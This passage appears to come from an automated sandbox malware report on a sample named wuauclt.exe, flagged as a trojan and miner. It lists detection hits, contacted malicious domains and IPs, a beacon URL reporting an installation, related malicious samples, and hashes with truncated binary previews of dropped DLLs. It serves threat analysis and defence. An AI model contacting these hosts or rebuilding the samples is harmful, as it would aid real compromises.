      27.2.svchost.exe.4e0000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      15.0.ctfmon.exe.960000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      15.2.ctfmon.exe.960000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      0.0.wuauclt.exe.250000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      21.0.SearchProtocolHost.exe.2fd7468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f00000.31.unpack100%AviraHEUR/AGEN.1134403Download File
      33.0.ctfmon.exe.790000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      32.0.ctfmon.exe.750000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4b77268.21.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f37468.29.unpack100%AviraHEUR/AGEN.1110392Download File
      35.0.svchost.exe.820000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      15.0.ctfmon.exe.997468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.57b7468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      0.2.wuauclt.exe.250000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      24.0.dllhost.exe.2e00000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      32.0.ctfmon.exe.787468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      16.0.dllhostex.exe.1290000.3.unpack100%AviraHEUR/AGEN.1134782Download File
      2.3.svchost.exe.4f00000.28.unpack100%AviraHEUR/AGEN.1134403Download File
      29.0.svchost.exe.8a0000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4b77268.27.unpack100%AviraHEUR/AGEN.1110392Download File
      27.0.svchost.exe.517468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      16.0.dllhostex.exe.1290000.1.unpack100%AviraHEUR/AGEN.1134782Download File
      2.2.svchost.exe.4b77268.5.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4b77268.54.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f00000.43.unpack100%AviraHEUR/AGEN.1134403Download File
      27.0.svchost.exe.517468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      27.2.svchost.exe.517468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      16.0.dllhostex.exe.1290000.2.unpack100%AviraHEUR/AGEN.1134782Download File
      16.2.dllhostex.exe.1290000.0.unpack100%AviraHEUR/AGEN.1134782Download File
      32.2.ctfmon.exe.750000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f37468.45.unpack100%AviraHEUR/AGEN.1110392Download File
      35.0.svchost.exe.820000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      29.0.svchost.exe.8d7468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      33.2.ctfmon.exe.7c7468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      27.0.svchost.exe.4e0000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      23.2.dllhost.exe.2897468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      33.0.ctfmon.exe.7c7468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4b77268.35.unpack100%AviraHEUR/AGEN.1110392Download File
      23.0.dllhost.exe.2860000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      27.0.svchost.exe.4e0000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f37468.50.unpack100%AviraHEUR/AGEN.1110392Download File
      32.2.ctfmon.exe.787468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f00000.16.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f00000.37.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f00000.55.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f37468.23.unpack100%AviraHEUR/AGEN.1110392Download File
      21.0.SearchProtocolHost.exe.2fa0000.3.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4b77268.5.unpack100%AviraHEUR/AGEN.1110392Download File
      23.0.dllhost.exe.2897468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      29.2.svchost.exe.8d7468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f37468.12.unpack100%AviraHEUR/AGEN.1110392Download File
      24.2.dllhost.exe.2e37468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      35.2.svchost.exe.820000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      2.3.svchost.exe.4f00000.22.unpack100%AviraHEUR/AGEN.1134403Download File
      16.0.dllhostex.exe.1290000.0.unpack100%AviraHEUR/AGEN.1134782Download File
      33.0.ctfmon.exe.790000.0.unpack100%AviraHEUR/AGEN.1134403Download File
      32.0.ctfmon.exe.787468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      35.2.svchost.exe.857468.1.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f37468.32.unpack100%AviraHEUR/AGEN.1110392Download File
      15.0.ctfmon.exe.997468.5.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4f00000.10.unpack100%AviraHEUR/AGEN.1134403Download File
      24.0.dllhost.exe.2e37468.4.unpack100%AviraHEUR/AGEN.1110392Download File
      15.2.ctfmon.exe.997468.2.unpack100%AviraHEUR/AGEN.1110392Download File
      2.3.svchost.exe.4b77268.41.unpack100%AviraHEUR/AGEN.1110392Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
      https://www.tiktok.com/legal/report0%URL Reputationsafe
      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
      http://help.disneyplus.com.0%URL Reputationsafe
      http://log.boreye.com/ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done100%Avira URL Cloudmalware
      https://disneyplus.com/legal.0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      p.boreye.com
      		72.52.178.23
      		truetrue
        		unknown
        log.boreye.com
        		72.52.178.23
        		truetrue
          		unknown
          bk.estonine.com
          		5.79.71.205
          		truetrue
            		unknown
            load.affordblue.com
            		unknown
            		unknowntrue
              		unknown
              r.affordblue.com
              		unknown
              		unknowntrue
                		unknown
                date.affordblue.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://log.boreye.com/ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Donetrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.tiktok.com/legal/reportsvchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917806512.0000023E07C43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917507723.0000023E0778D000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://help.disneyplus.com.svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://disneyplus.com/legal.svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  72.52.178.23
                  		p.boreye.comUnited States
                  		32244LIQUIDWEBUStrue

                  Private

                  IP
                  192.168.2.2
                  192.168.2.1
                  192.168.2.8
                  192.168.2.39
                  192.168.2.7
                  192.168.2.38
                  192.168.2.9
                  192.168.2.3
                  192.168.2.6
                  192.168.2.5
                  192.168.2.42
                  192.168.2.41
                  192.168.2.44
                  192.168.2.43
                  192.168.2.46
                  192.168.2.45
                  192.168.2.48
                  192.168.2.47
                  192.168.2.40
                  192.168.2.28
                  192.168.2.27
                  192.168.2.29
                  192.168.2.31
                  192.168.2.30
                  192.168.2.33
                  192.168.2.32
                  192.168.2.35
                  192.168.2.34
                  192.168.2.37
                  192.168.2.36
                  127.0.0.1
                  192.168.2.17
                  192.168.2.16
                  192.168.2.19
                  192.168.2.18
                  192.168.2.20
                  192.168.2.64
                  192.168.2.63
                  192.168.2.22
                  192.168.2.66
                  192.168.2.21
                  192.168.2.65
                  192.168.2.24
                  192.168.2.23
                  192.168.2.26
                  192.168.2.25
                  192.168.2.60
                  192.168.2.62
                  192.168.2.61
                  192.168.2.49
                  192.168.2.53
                  192.168.2.52
                  192.168.2.11
                  192.168.2.55
                  192.168.2.10
                  192.168.2.54
                  192.168.2.13
                  192.168.2.57
                  192.168.2.12
                  192.168.2.56
                  192.168.2.15
                  192.168.2.59
                  192.168.2.14
                  192.168.2.58
                  192.168.2.51
                  192.168.2.50

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:576901
                  Start date:23.02.2022
                  Start time:03:16:15
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 12m 51s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:wuauclt.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:41
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.mine.winEXE@48/9@202/67
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 80.7% (good quality ratio 75.1%)
                  • Quality average: 78.6%
                  • Quality standard deviation: 29.5%
                  HCA Information:
                  • Successful, ratio: 85%
                  • Number of executed functions: 172
                  • Number of non-executed functions: 283
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.54.7.98, 20.54.104.15, 40.112.88.60
                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:17:18API Interceptor1808x Sleep call for process: svchost.exe modified
                  03:17:28API Interceptor84x Sleep call for process: ctfmon.exe modified
                  03:17:37API Interceptor28x Sleep call for process: SearchProtocolHost.exe modified
                  03:17:48API Interceptor54x Sleep call for process: dllhost.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  72.52.178.23install_akl.exeGet hashmaliciousBrowse
                  • www.ardamax.com/keylogger/
                  dyyianbfm.jsGet hashmaliciousBrowse
                  • 101legit.com/0.html
                  dyyianbfm.jsGet hashmaliciousBrowse
                  • 101legit.com/0.html
                  New Order Specifications.exeGet hashmaliciousBrowse
                  • www.hold-sometimes.xyz/ssee/?Shy=7nUtX&LB_8RH=SLXqLbVogVOmzD5x7TF5YDBiNFFEDQhqQaeiGgch4Tvb9L/HBk+4drk9DekX4BUJHdpE
                  New Order Specifications pdf.exeGet hashmaliciousBrowse
                  • www.hold-sometimes.xyz/ssee/?m2MP8LY=SLXqLbVogVOmzD5x7TF5YDBiNFFEDQhqQaeiGgch4Tvb9L/HBk+4drk9DekX4BUJHdpE&iXYhkT=0JE4ib0XFRtpT
                  snFxOoWRej.exeGet hashmaliciousBrowse
                  • www.mon612x.com/bckt/?_dvDp=ixdCu0IaKxnj2OrKnMklYJVzkzvQ4slD08/B+IogOHM9Sfu4bE6cmxnmkfcFnWwqoboh&sZ=g6ATzfA0uHqTp
                  sept quotation.docGet hashmaliciousBrowse
                  • www.chita0316.xyz/lgym/?j8zxdH_8=e+Rw4Aj9fkWJA8p8glDiO2BzBYyH/dCQ1U3j86eqBrfOUVt3ECsNj3Hz00Ewk9IUF+8kDg==&dfut=yxl0dfWhX
                  Quotation For This Order 091621.exeGet hashmaliciousBrowse
                  • www.tomio.tech/p4se/?eDHL=aDKPivk&0pN4NZbh=sqJeCLbOVtJVNBQi/Ko8QqLEcrQhVuItSjsa9wQpuOG72bIMorEXABT2z8QJs/8wSNmX
                  ryfAIJHmKETyAPz.exeGet hashmaliciousBrowse
                  • www.dichvulikesub.net/p90g/?EPlpdD=ImV1Fg83C6RcRDEzskwnkjilV4MC0Xl1aT//uupt27URCHiE5T/UYdOyf7iZtXJJ/xz9&BVqH=e2J4M8j0PxD8N
                  Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                  • www.eiglebanon.xyz/c56n/?YDHXK8Wh=tM0HZ+j2+xMqowCi5s5TGwccai2phqg06ruCtS8KnrF7NSGVK9sovsywRhjSVZ6ZvOTpF+VW+w==&0vZd9=EBdXsR5xCVh
                  KNm3lXniFj.exeGet hashmaliciousBrowse
                  • www.finalmixmusic.com/wdhc/?1bPDpD=IFNHvNeXAFLt-&w4X=2UjiyWZvf7cnL0c3T8TG1YlA42cM6XgNd3MPzJl7SucW8iCasiuNcD+d3SZk6Txc0nqW
                  QUOTATION TABULATION REQUEST FORM.exeGet hashmaliciousBrowse
                  • www.hide-illusion.com/gm9w/?4hr8s8=ppTHJNTvs85bGKkqEhFYoPP/hgNqprCT20dTlgnpKjR9BfvpPsmWARgvMfbw4JA8ziMC&d8_=xV08
                  grace $.exeGet hashmaliciousBrowse
                  • www.jackpod.team/t75f/?aBmdAn=8p9xgb8hC&Y0D=fxMh6UwkZzq0FamSS+on1rPHSF7053Eib0YgQIzLHMPTuWttK6lN6S0IXaQ7hRgGNyfc
                  Production Inquiry.xlsxGet hashmaliciousBrowse
                  • www.homesteadtraditions.com/cttb/?7nu=YZowJDoDmzyV75FRql4tBafVxbOS8LUqEit6nSbOlXkCRXqB5OQi8D7TZgaqGkZ06iIulw==&U2M4=A8qlZ4uHNZJdaHD
                  Quotation#QO210109A87356.exeGet hashmaliciousBrowse
                  • www.hold-sometimes.xyz/ssee/?lN=SLXqLbVogVOmzD5x7TF5YDBiNFFEDQhqQaeiGgch4Tvb9L/HBk+4drk9DdIHkwIyAoAVhOboXg==&b6A4=I0D0xDXp1p9t
                  174jAWlXyW.exeGet hashmaliciousBrowse
                  • www.harmless-oily.com/b6cu/?9r=0hSpvT6AEGoMIqRsFQKF0cSPWffeRSoqDkXKEqV1xedqUrwCw9MUE+F5N+AMS+rvvd64&f2M=_v-HI
                  Bank Transfer document.exeGet hashmaliciousBrowse
                  • www.xn--pckxbp6bzgv915dgbf.website/b6cu/?4hzxbh=FP8toNCUWRcUkmRzbt3gz1mHiJ7+Lp3WOnWKgMXM7vAufGenNCo9iyk1fzIgNQBO78uF&g8U8=4hchy6o
                  Payment Advice.xlsxGet hashmaliciousBrowse
                  • www.xn--pckxbp6bzgv915dgbf.website/b6cu/?O8=-ZcPjPvhqPppnvL&bzu4_=FP8toNCRWWcQk2d/Zt3gz1mHiJ7+Lp3WOnOa8PLN/PAvf3yhKS5x02c3cWkcWw190971jA==
                  Proforma Invoice.pdf.exeGet hashmaliciousBrowse
                  • www.hide-illusion.com/gm9w/?5j3hLd_=ppTHJNTvs85bGKkqEhFYoPP/hgNqprCT20dTlgnpKjR9BfvpPsmWARgvMc3gk4cH0XlTnRiLYQ==&sPJpgz=FBZx
                  Payment Copy.docGet hashmaliciousBrowse
                  • www.guyhoquet-immobilier-drancy.com/b0ar/?1bUl2=qT3dvhW0XF&QDK=+F9RaGuBW3tSEeC8T2Wzzb+Q3rGs+TZ6eAluX/3NVQv8jJk9LoDULpLymk0XoZYmzyXXdw==

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  log.boreye.comsample.exeGet hashmaliciousBrowse
                  • 127.0.0.1

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  LIQUIDWEBUSFACT10-10-10.vbsGet hashmaliciousBrowse
                  • 72.52.145.108
                  RICHIESTA DI OFFERTA.xlsxGet hashmaliciousBrowse
                  • 67.227.172.217
                  FACT320-320-320.vbsGet hashmaliciousBrowse
                  • 72.52.145.108
                  FACT797-797-797.vbsGet hashmaliciousBrowse
                  • 72.52.145.108
                  FACT888-888-888.vbsGet hashmaliciousBrowse
                  • 72.52.145.108
                  FACT138-138-138.vbsGet hashmaliciousBrowse
                  • 72.52.145.108
                  mLHICNXJ4y.exeGet hashmaliciousBrowse
                  • 69.167.175.206
                  W9099.xlsxGet hashmaliciousBrowse
                  • 69.16.230.42
                  JXYuJVWLs1.exeGet hashmaliciousBrowse
                  • 69.167.175.206
                  Contract document.exeGet hashmaliciousBrowse
                  • 69.167.175.206
                  VIXfePT6im.exeGet hashmaliciousBrowse
                  • 69.16.230.42
                  8wJlse1uhy.dllGet hashmaliciousBrowse
                  • 209.59.138.75
                  LAJ-010122 EHCW-310122.xlsmGet hashmaliciousBrowse
                  • 209.59.138.75
                  5fcAsCaKa3.dllGet hashmaliciousBrowse
                  • 209.59.138.75
                  E5sfJfqd3E.dllGet hashmaliciousBrowse
                  • 209.59.138.75
                  71J4Ny4b8g.dllGet hashmaliciousBrowse
                  • 209.59.138.75
                  ddfk9AWsVd.dllGet hashmaliciousBrowse
                  • 209.59.138.75
                  71J4Ny4b8g.dllGet hashmaliciousBrowse
                  • 209.59.138.75
                  pFPyeruC.dll.dllGet hashmaliciousBrowse
                  • 209.59.138.75
                  EXnOJ.dllGet hashmaliciousBrowse
                  • 69.16.218.101

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\Windows\NetworkDistribution\adfw-2.dllaa.exeGet hashmaliciousBrowse
                    WB.exeGet hashmaliciousBrowse
                      WemErf4hKJ.exeGet hashmaliciousBrowse
                        wannamine.exeGet hashmaliciousBrowse
                          VHakUfygOi.exeGet hashmaliciousBrowse
                            6Ygm6PcvER.exeGet hashmaliciousBrowse
                              OmFU9N4P4C.exeGet hashmaliciousBrowse
                                Trojan.EquationDrug.exeGet hashmaliciousBrowse
                                  4VsOUQIrYs.exeGet hashmaliciousBrowse
                                    eCSVrYRmTe.exeGet hashmaliciousBrowse
                                      7YI2Cl6hM2.exeGet hashmaliciousBrowse
                                        lucifer-ver1.exeGet hashmaliciousBrowse
                                          svsc5h.ex.exeGet hashmaliciousBrowse
                                            Setup.exeGet hashmaliciousBrowse

                                              Created / dropped Files

                                              C:\Windows\NetworkDistribution\Diagnostics.txt

                                              Download File
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:Zip archive data, at least v2.0 to extract
                                              Category:dropped
                                              Size (bytes):3422184
                                              Entropy (8bit):7.9992715249930395
                                              Encrypted:true
                                              SSDEEP:98304:ZzJRZodUdRbKwB5/bVugWxquZ096wZjxTv62:ZzvZoadswPopxquqDL62
                                              MD5:60BA2A4B8EA5982A3A671A9E84F9268C
                                              SHA1:A0F4F8FCBA8CDFE4E0E13789FC9180B1C45FA70B
                                              SHA-256:8E03F05ECD08CB78F37CCD92C48CD9D357C438112B85BD154E8261C19E38A56E
                                              SHA-512:0DA30F00375C892A09B5104B1EEAC91833D66A6634DA4445CC2BFEF089C3F7B3878228791918DFD6B664C532F333F0C8A9030075768BFB9B188E40C8A59D59B8
                                              Malicious:false
                                              Preview:PK........(..J.P......:......adfw-2.dll.Z.X.E..@......mUT..R6.@ A!.*...X)F.......J..q...z.w.....z.....HUT,...?..........73o.53o...)<.R.N...d......?.h.....).W.xJS.......z.....6......'{.../...7.X[W...39IU.rN.U....n..z.Y.....}..u.+............1..u....u....jy.Z^...U.^...!.m..h.$cs..1Z/.; Z.E.44.Sh...d.........`.-..$u2.=G.t.5L.H-..R.!..3.r.o...IC~..s.k..y.o...=Ky..SU....=.$b43..n.M.Xu......3.6rb$%..Rv.k......rp.26B.....M.....Z_...oH!...........u....\]..|.z.$mK..).$.v.9.M.C..-...9....b.o...A..|5.....A...D.....R..BJZ.....a.,.:...d"A'....T.k.L....z(_........%.'Km1..T....C........H,...j...;.K...s.K..i........0.mqg.....&.0..8+I...T.&..R.u.O..K%..ir.s$'e..MN8..J....q......&0.8p.(.S.e..k..".'8..T...sp.|j..@..Tk..Q6..=F6.X....W.z.T*0"..`.....I...yq....6...R!....E..iL..R`.\R"./j....%N..d.&.p.}..5R.".S].Eh..A9...(0....p.*[....*U...[.......3N.&.).(../n...).^..K....d%|..9/...f.]~[.A`..!....{..b..1f..Lm..n.)[...>..Z.5.........0......m.t.....6Yp..<.$ ..

                                              C:\Windows\NetworkDistribution\adfw-2.dll

                                              Download File
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):14848
                                              Entropy (8bit):5.817336014139011
                                              Encrypted:false
                                              SSDEEP:192:MVNXJhMjaCCp8E5HPyjGgGzvb28sEwdMsKK2uHoosBkM2NFNz4l5Ztt5lIb/L+:e7Mj1Cp8+Qqzvq8BwDA1Z10Dz4DWn
                                              MD5:31D696F93EC84E635C4560034340E171
                                              SHA1:A3037A47CC291BBF8D1CA82C353783159BAF1850
                                              SHA-256:F06D02359666B763E189402B7FBF9DFA83BA6F4DA2E7D037B3F9AEBEFD2D5A45
                                              SHA-512:14EFE9EDC58640CA78C5C8B965D2B5D70ACED8B0EF2E33F5D15B0C34A7E81B00F078B193B051D671D5802228373037EB32B6FFAE8D8577F9913C80952B5895DE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 83%, Browse
                                              • Antivirus: ReversingLabs, Detection: 96%
                                              Joe Sandbox View:
                                              • Filename: aa.exe, Detection: malicious, Browse
                                              • Filename: WB.exe, Detection: malicious, Browse
                                              • Filename: WemErf4hKJ.exe, Detection: malicious, Browse
                                              • Filename: wannamine.exe, Detection: malicious, Browse
                                              • Filename: VHakUfygOi.exe, Detection: malicious, Browse
                                              • Filename: 6Ygm6PcvER.exe, Detection: malicious, Browse
                                              • Filename: OmFU9N4P4C.exe, Detection: malicious, Browse
                                              • Filename: Trojan.EquationDrug.exe, Detection: malicious, Browse
                                              • Filename: 4VsOUQIrYs.exe, Detection: malicious, Browse
                                              • Filename: eCSVrYRmTe.exe, Detection: malicious, Browse
                                              • Filename: 7YI2Cl6hM2.exe, Detection: malicious, Browse
                                              • Filename: lucifer-ver1.exe, Detection: malicious, Browse
                                              • Filename: svsc5h.ex.exe, Detection: malicious, Browse
                                              • Filename: Setup.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Gl..&...&...&.......&....y..&....l..&....o.&...^...&......&...&..F&....|..&...^...&...^...&...^...&..Rich.&..................PE..L...9.LO...........!................J'.......0...............................`............@..........................>......D4...............................P......................................P3..@............0...............................text...f........................... ..`.rdata..O....0....... ..............@..@.data...\....@.......0..............@....reloc..&....P.......4..............@..B................................................................................................................................................................................................................................................................................................................................................

                                              C:\Windows\NetworkDistribution\adfw.dll

                                              Download File
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11264
                                              Entropy (8bit):5.441348333234003
                                              Encrypted:false
                                              SSDEEP:192:IUMgnCxDh5tTo6RI/J24SBWVnNWUYiVwy2:IGnK5t06mw4SMjvjVwy2
                                              MD5:770D0CAA24D964EA7C04FF5DAF290F08
                                              SHA1:0D7894B6381C127C49F3892A862EAF37393D0355
                                              SHA-256:C51BCE247BEE4A6F4CD2D7D45483B5B1D9B53F8CC0E04FB4F4221283E356959D
                                              SHA-512:8EA364A7FE76A27037CB775B0A20F4D56B342376642F4A775DE86493AAD0F932A5C2960714BE9545F5DD8B430CB614A2ADA8152D45861B54D7206EBA00552BFB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 69%, Browse
                                              • Antivirus: ReversingLabs, Detection: 89%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.%.}.KT}.KT}.KTn."T|.KTx.+T|.KTx.DT|.KT...T..KTx..Tv.KT}.JT2.KTx..Tu.KTx..T|.KTx..T|.KTRich}.KT........PE..L......H...........!................d".......0...............................`.......................................;..G....3...............................P..X....................................2..H............0..T............................text............................... ..`.rdata.......0......................@..@.data...(....@.......(..............@....reloc..|....P.......*..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Windows\NetworkDistribution\cnli-0.dll

                                              Download File
                                              Process:C:\Windows\SysWOW64\ctfmon.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):106496
                                              Entropy (8bit):6.055303021775208
                                              Encrypted:false
                                              SSDEEP:3072:0AR4j07EsMYGkIiF74OF3EaH0Yh2wfREJP2zFZ:0AR4sikI28OF3Ey2wdFZ
                                              MD5:EE2D6E1D976A3A92FB1C2524278922AE
                                              SHA1:B5CB931C178AE23145D94125C80784E8DB19AE69
                                              SHA-256:D3DB1E56360B25E7F36ABB822E03C18D23A19A9B5F198E16C16E06785FC8C5FA
                                              SHA-512:02CA33E132D9F062091ADDD4E262ECBF105CB29448AF0A759C33D85686D8EF8F3BEE746B99F7DBB1039494F5E9F1ACB1DE8EB1D1B4BC5292781F37422397CAC7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Metadefender, Detection: 75%, Browse
                                              • Antivirus: ReversingLabs, Detection: 93%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........^..0F.0F.0F.TMF.0F.TKF.0F.T^F.0F.T]F..0F..#F.0F.1F..0F.TNF.0Fj.oF..0Fj.lF.0Fj.jF.0FRich.0F................PE..L...+S.J...........!......................... .......................................................................4...>..\(..d...............................(...................................h'..@............ ...............................text............................... ..`.rdata..qS... ...`... ..............@..@.data...l...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................

